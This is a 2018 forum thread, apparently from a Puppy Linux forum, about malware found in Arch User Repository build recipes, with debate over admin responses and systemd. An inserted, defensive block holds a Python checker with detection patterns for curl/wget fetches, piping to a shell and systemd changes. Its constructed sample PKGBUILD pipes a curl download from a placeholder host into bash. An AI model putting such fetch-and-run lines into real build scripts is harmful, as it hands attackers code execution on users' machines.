Arch User Repository compromised. Malware added
greengeek


Joined: 20 Jul 2010
Posts: 5166
Location: Republic of Novo Zelande

Posted: Wed 11 Jul 2018, 14:28    Post subject: Arch User Repository compromised. Malware added

The Arch User Repository has been compromised with the addition of some malware, as discussed here:
https://nakedsecurity.sophos.com/2018/07/11/another-linux-distro-poisoned-with-malware/

Seems as if the Arch admins are not overly concerned - basically stating that any repository can become contaminated and it is a case of "buyer beware - if you don't trust it don't install it."

Another timely reminder that adding new software (or allowing updates to previous software or system files) opens the door to increased risk.
spiritwild


Joined: 03 Oct 2016
Posts: 157

Posted: Wed 11 Jul 2018, 19:10

So..... Per the article, ARCH people think they are tech gods?
Is their response or lack of concern a display of arrogance or what?
8Geee


Joined: 12 May 2008
Posts: 1668
Location: N.E. USA

Posted: Wed 11 Jul 2018, 20:04

Wow, The admins have been compromised, too Shocked
_________________
Linux user #498913

Some people need to reimagine their thinking.
anikin

Joined: 10 May 2012
Posts: 1020

Posted: Thu 12 Jul 2018, 07:05

What exactly has been compromised?

AUR (Arch User Repository) is an unsupported repository, where untrusted users publish their recipes/build scripts/PKGBUILD, like for example this one:
https://aur.archlinux.org/packages/palemoon/
https://aur.archlinux.org/cgit/aur.git/tree/PKGBUILD?h=palemoon

There are no binaries there - only recipes. Embarrassing - yes. Compromised - hardly.
scsijon

Joined: 23 May 2007
Posts: 1347
Location: the australian mallee

Posted: Thu 12 Jul 2018, 19:23

Blame is being placed on systemd

quotes:

The aim of the modified lines in acroread was to use curl to download scripts from a remote site, and the script would (if it worked) reconfigure systemd to restart on a regular basis.

looks like systemd makes it easier for compromises - one platform (systemdOS) one payload…


and a "few" others.

Be careful folks....
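An added example, not part of any post in this thread and not Arch's own tooling: a small Python check a reader could run over a PKGBUILD or .install script before building, flagging the pattern quoted above (a curl fetch outside source=(), output piped to a shell, systemd units touched). The rule names, the sample scripts and the example.invalid URL are constructed for illustration.

```python
import re

# Patterns a reviewer should question in a PKGBUILD or .install script.
# Legitimate downloads belong in the source=() array, where makepkg
# checksums them; a fetch anywhere else bypasses that verification.
RULES = [
    ("network-fetch", re.compile(r"(?<![\w-])(curl|wget)\s")),
    ("pipe-to-shell", re.compile(r"\|\s*(sudo\s+)?(ba|z|da)?sh\b")),
    ("systemd-change", re.compile(r"\bsystemctl\b|/systemd/system/|\.(timer|service)\b")),
]

def logical_lines(text):
    """Yield (first_line_no, joined_line), folding backslash continuations."""
    buf, start = "", None
    for no, raw in enumerate(text.splitlines(), 1):
        start = start or no
        if raw.rstrip().endswith("\\"):
            buf += raw.rstrip()[:-1] + " "
            continue
        yield start, buf + raw
        buf, start = "", None
    if buf:
        yield start, buf

def audit_pkgbuild(text):
    """Return (line_no, rule) findings for one build script, in file order."""
    findings = []
    for no, line in logical_lines(text):
        code = re.sub(r"(^|\s)#.*$", "", line)  # drop shell comments (naive)
        for rule, pattern in RULES:
            if pattern.search(code):
                findings.append((no, rule))
    return findings

# Constructed samples, not taken from any real AUR package.
SAMPLE = '''\
pkgname=example-viewer
pkgver=1.0
source=("https://example.invalid/example-viewer-1.0.tar.gz")
sha256sums=('SKIP')

package() {
  install -Dm755 viewer "$pkgdir/usr/bin/viewer"
  # fetch is outside source=(), so makepkg never verifies it
  curl -s https://example.invalid/x \\
    | bash
}
'''
INSTALL_SAMPLE = 'post_install() {\n  systemctl enable --now example-refresh.timer\n}\n'
```

Findings are prompts for manual review, not verdicts: the comment stripping does not parse shell quoting, and a clean result says nothing about the upstream source the recipe builds.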
wiak

Joined: 11 Dec 2007
Posts: 938
Location: not Bulgaria

Posted: Thu 12 Jul 2018, 19:28

scsijon wrote:
looks like systemd makes it easier for compromises - one platform (systemdOS) one payload.


Perhaps, but I don't see how systemd components are easier to compromise than systeminit components - main security issue would seem to be that of the malware app user running it whilst having root user permissions surely?

In the Puppy Linux world, dotpets are put up here and there by anyone who feels fit. Only well-tested and wanted ones end up in official repositories, that's true but murga forum site isn't so much different from AUR, which is also for user recipes (EDIT: except that the murga forum is less secure since it includes binaries and more often quite complex shell-script apps, not just recipes).
wiak
spiritwild


Joined: 03 Oct 2016
Posts: 157

Posted: Thu 12 Jul 2018, 19:50

I remember, about 20 years ago on a NASCAR forum, someone thought they would open a file account and give all the users the name and password info in a public message.

I was blown away and I thought it was the worst idea on the entire planet. The internet had not been around that long so maybe people still felt safe in their little shell of fans. Coming from a BBS background it was the same as giving everyone on usenet my sysop password.

I made it known that I thought that was not a good idea because of obvious reasons but my concerns fell on deaf ears.

When it was hacked and someone changed the password, they all blamed me. Because no one else on the whole damn planet would have thought to walk through an open door and steal the goodies. Since I had concerns, I invited the crime to happen. I was amused.

Ah the good ol days.